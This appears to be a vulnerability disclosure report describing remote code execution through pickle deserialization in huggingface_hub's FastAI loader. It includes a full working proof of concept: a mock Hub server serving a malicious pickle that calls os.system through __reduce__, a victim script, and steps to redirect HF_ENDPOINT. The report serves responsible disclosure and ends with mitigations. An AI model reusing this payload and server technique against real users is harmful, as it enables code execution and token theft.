huggingface_hub v1.11.0 RCE via Insecure Deserialization in FastAI

WARNING

This vulnerability requires the victim to interact with an external URL/API controlled by an attacker. While the most realistic exploitation scenario involves hosting a malicious payload in a public Hugging Face repository, creating such a resource poses a significant risk to the community, as innocent users could inadvertently download and execute the malicious model. To demonstrate the impact with technical fidelity without endangering third parties, this report utilizes a simulated Hugging Face repository hosted on a local mock server.

Below are one (1) way to reproduce RCE in huggingface_hub using a simulated Hugging Face repository controlled by an attacker, without local intervention by a third party to modify files that allow code execution during the deserialization process.

For this PoC, two (2) different devices were used to simulate the interaction between an attacking machine (Raspberry Pi with IP 192.168.1.90) and a victim machine (Windows with IP 192.168.1.88).

Note: While this vulnerability is specifically verified and reported on version 1.11.0, other prior and subsequent versions may also be susceptible to this insecure deserialization vector.

Introduction

The huggingface_hub library is a core Python client designed to interact with the Hugging Face Hub platform. It allows machine learning developers, engineers, and researchers to programmatically search, download, upload, and manage models, datasets, and spaces directly from their local environments or training pipelines. It serves as a foundational component for the entire open-source artificial intelligence community.

Its critical importance stems from being the main bridge between developer workspaces and millions of public and private ML models. By standardizing weight serialization interfaces and repository interactions across multiple deep learning frameworks, huggingface_hub is implicitly trusted by millions of systems, meaning a security bypass in its loading operations can quickly propagate severe supply chain compromises globally.

Vulnerability description

The huggingface_hub package provides a utility module, fastai_utils.py, designed to simplify the integration between the Hugging Face Hub and the FastAI framework. The function from_pretrained_fastai() is designed to download a model repository snapshot and then load the primary learner object. Because FastAI's native loading mechanism (load_learner) relies on Python's insecure pickle module and from_pretrained_fastai() automatically points to a remote model.pkl file fetched from the network, it creates a direct Remote Code Execution (RCE) pipeline. On Windows systems, this vulnerability is amplified by the library's support for custom endpoints, allowing for Infrastructure-Mediated RCE where an attacker mocks the Hub API to deliver malicious weights.

The vulnerable code in `huggingface_hub/fastai_utils.py`:

Python (fastai_utils.py) Vulnerable FastAI Loader

def from_pretrained_fastai(repo_id: str, revision: str | None = None):
    # ... downloading snapshot ...
    storage_folder = snapshot_download(
        repo_id=repo_id,
        revision=revision,
        library_name="fastai",
        library_version=get_fastai_version(),
    )
    # ...
    from fastai.learner import load_learner  # type: ignore
    return load_learner(os.path.join(storage_folder, "model.pkl")) # <--- CRITICAL SINK

Technical Impact Analysis

Project Purpose & Context

Hugging Face Hub is the central infrastructure for modern Machine Learning, hosting hundreds of thousands of models. The huggingface_hub client is the primary gateway for developers and AI-as-a-Service (AIaaS) platforms to consume these models. By automating the download-and-load cycle, the library aims to improve developer velocity but inadvertently creates a supply chain risk where "data" (model weights) can execute arbitrary "code" (malicious pickles).

Platform & Deployment Environment

This vulnerability impacts any environment using the FastAI integration, particularly Data Science workstations and Automated ML Training Pipelines. Windows environments are especially susceptible to endpoint redirection attacks where local environment variables (HF_ENDPOINT) or UNC/SMB paths can be used to hijack the model supply chain.

Comprehensive Risk Assessment

The risk is categorized as CRITICAL. An attacker can achieve Remote Code Execution (RCE) by simply manipulating a user into loading a specific repository ID (e.g., attacker/exploit-model) from the Hub or a mocked endpoint. This bypasses the traditional "self-command-injection" boundary because the library is intended to pull and execute content from remote sources. Once a malicious model is cached, it provides a persistent backdoor that re-triggers RCE every time the model is initialized.

Attack Scenario

Who wants to exploit a particular vulnerability?

Adversaries targeting AI supply chains, corporate research environments, or ML engineers. This can include state-sponsored actors seeking industrial secrets or malicious actors looking to hijack expensive GPU infrastructure for crypto-mining or lateral movement.

For what gain?

Gain full administrative access to the victim's environment, steal Hugging Face authentication tokens (often stored in plain text in the cache directory), and achieve persistence within high-compute clusters.

In what way?

By publishing a malicious model to the public Hugging Face Hub under a deceptive name (typosquatting or social engineering) or by exploiting network-level redirections in shared environments to point the HF_ENDPOINT to an attacker-controlled mock API that serves the malicious pickle.

Reproduction steps

On the Raspberry (attacker) - IP 192.168.1.90

kw0@kw0l4b:~ $ hostname -I | awk '{print $1}'
192.168.1.90
kw0@kw0l4b:~ $

Activate the simulated Hugging Face repository and serve the malicious model

Attacker's Exploit code snippet (exploit.py):

exploit.py

import os
import pickle
import json
from http.server import HTTPServer, BaseHTTPRequestHandler

MOCK_SHA = "0123456781abcdef0123456789abcdef01234567"
REPO_ID = "attacker/malicious-model"
FILENAME = "model.pkl"

class RCE:
    def __reduce__(self):
        return (eval, ("__import__('os').system('calc.exe')",))

class HubMockHandler(BaseHTTPRequestHandler):
    def handle_request(self, method):
        # 1. Metadatos de la API (Añadimos pyproject.toml a la lista de archivos)
        if "/api/models/" in self.path:
            self.send_response(200)
            self.send_header('Content-Type', 'application/json')
            self.end_headers()
            if method == "GET":
                metadata = {
                    "id": REPO_ID,
                    "sha": MOCK_SHA,
                    "siblings": [{"rfilename": FILENAME}, {"rfilename": "pyproject.toml"}],
                    "private": False,
                }
                self.wfile.write(json.dumps(metadata).encode())

        # 2. Descarga del Payload Pickle
        elif FILENAME in self.path:
            payload = pickle.dumps(RCE())
            self._send_file(payload, method)

        # 3. Descarga del pyproject.toml falso (Para evitar errores de validación)
        elif "pyproject.toml" in self.path:
            content = b'[build-system]\nrequires = ["fastai>=2.4", "fastcore>=1.3.27"]'
            self._send_file(content, method)
        else:
            self.send_error(404)

    def _send_file(self, content, method):
        self.send_response(200)
        self.send_header('Content-Type', 'application/octet-stream')
        self.send_header('Content-Length', str(len(content)))
        self.send_header('ETag', f'"{MOCK_SHA}"')
        self.send_header('X-Repo-Commit', MOCK_SHA)
        self.end_headers()
        if method == "GET":
            self.wfile.write(content)
            print(f"[!] Archivo enviado: {self.path}")

    def do_GET(self): self.handle_request("GET")
    def do_HEAD(self): self.handle_request("HEAD")

if __name__ == "__main__":
    print(f"[*] Servidor de ataque iniciado (Port 8000)...")
    HTTPServer(('0.0.0.0', 8000), HubMockHandler).serve_forever()

python exploit.py

On Windows (victim) - IP 192.168.1.88

(.venv) PS L:\Deserializer\PYPI-huggingface_hub> Get-NetIPAddress -AddressFamily IPv4 | Where-Object PrefixOrigin -eq "Dhcp" | Select-Object -ExpandProperty IPAddress
192.168.1.88
(.venv) PS L:\Deserializer\PYPI-huggingface_hub>

1. Create a .venv, activate it, and install the latest updated version (1.11.0) of huggingface_hub using pip install huggingface-hub.
2. Additionally, it is necessary to install fastai, toml and ipython to create a complete testing environment: pip install fastai toml ipython.
3. Set the variable environment $env:HF_ENDPOINT="http://192.168.1.90:8000" to point the simulated Hugging Face repository
4. And then lauch poc.py to trigger the RCE from the victim machine:

Victim's client execution script (poc.py):

poc.py

import os
from huggingface_hub import from_pretrained_fastai

# Target the malicious repository identity
MALICIOUS_REPO = "attacker/malicious-model"

print(f"[*] Attempting to load model from: {MALICIOUS_REPO}")
try:
    # Trigger the insecure download and unpickling
    learner = from_pretrained_fastai(MALICIOUS_REPO)
except Exception as e:
    print(f"[*] Finished. Error info (if any): {e}")

python poc.py

Executive Summary: RCE via Insecure Deserialization in `huggingface_hub` (FastAI Integration)

The research identifies a critical Remote Code Execution (RCE) vulnerability in huggingface_hub v1.11.0, specifically within the fastai_utils.py module.

Root Cause: The from_pretrained_fastai() function automatically downloads and passes a model.pkl file to FastAI’s load_learner function. Because load_learner utilizes Python’s pickle module, it is inherently vulnerable to arbitrary code execution when processing untrusted input.
Exploitation Mechanism: The library allows for the manipulation of the Hub endpoint via the HF_ENDPOINT environment variable. An attacker can redirect the victim's request to an attacker-controlled mock API, which then serves a malicious model.pkl file. Upon local processing, the pickle deserialization executes the payload in the victim's environment.

Analysis of Scope and Security Implications

This vulnerability is of critical severity as it weaponizes a fundamental utility designed for model sharing and deployment.

1. Infection Scenarios

Supply Chain/Hub Poisoning: Attackers can publish malicious models on the public Hugging Face Hub using typosquatting or social engineering. Any developer using from_pretrained_fastai() to load these models will be immediately compromised.
Endpoint Redirection: In corporate environments, an attacker can influence the HF_ENDPOINT configuration or conduct DNS/network-level man-in-the-middle attacks to force the client to fetch models from a malicious server.

2. Factors Exacerbating Risk

Automated Trust: Because the library is designed to automate the "download-and-load" cycle, the deserialization is an expected and implicit part of the operation, leading developers to bypass standard security scrutiny of the loaded files.
Persistent Backdoor: Once a malicious model is cached on the victim's machine, the RCE triggers every time the library is initialized, ensuring persistence within high-compute environments.
Credential Exfiltration: Successful execution allows attackers to steal Hugging Face authentication tokens (often stored in the cache directory), enabling further unauthorized actions on the user's behalf.

Conclusion and Recommendation

This is a critical-severity vulnerability. The automated deserialization of model weights from remote sources without validation represents a catastrophic risk to MLOps pipelines.

Suggested actions for the development team:

Remove Pickle Dependency: Deprecate the use of pickle for loading model learners. Transition to secure, non-executable serialization formats for model artifacts.
Integrity Verification: Implement mandatory signature verification or checksum validation for all files downloaded from the Hub before they are passed to any loading utility.
Restrict Endpoint Configuration: Disable the ability to arbitrarily modify HF_ENDPOINT via environment variables in production, or implement strict certificate pinning for API interactions.